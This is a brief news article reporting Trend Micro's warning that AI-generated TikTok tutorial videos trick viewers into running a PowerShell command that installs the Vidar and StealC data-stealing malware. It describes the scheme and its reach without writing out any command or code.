AI-generated TikTok videos used to spread malware
Cybersecurity experts at Trend Micro are sounding the alarm: hackers now use AI-generated videos on TikTok to spread malicious software that steals personal data.
The scam is fairly straightforward. Attackers create fake tutorial videos that claim to show viewers how to activate Windows or Microsoft Office for free, or unlock premium features in popular apps like Spotify and CapCut. These videos appear slick and convincing, often showing someone opening the Windows Run dialog and typing in a PowerShell command.
But instead of unlocking any features, running the command downloads a harmful script. This script then installs dangerous malware known as Vidar and StealC, which are designed to steal sensitive data. These tools can grab everything from saved passwords and credit card numbers to crypto wallet info, browser cookies, 2FA codes, and even screenshots.
One reason this scheme is effective is TikTok’s recommendation algorithm. It helps these fake tutorials reach massive audiences. One example has already racked up over 500,000 views, 20,000 likes, and 100+ comments.
According to Trend Micro, the videos are nearly identical, with only minor changes like download links or camera angles. The narration is also likely AI-generated, suggesting the entire process is automated.
The way attackers deliver their payload sets this campaign apart from previous malware tricks. In the past, malicious links were placed in the video description comments or locations that security tools could often detect. Now, by embedding the attack instructions directly into the video content itself, cybercriminals can avoid detection more easily.
This development shows how attackers are evolving, using AI and viral platforms like TikTok to reach more people while flying under the radar of traditional security systems.
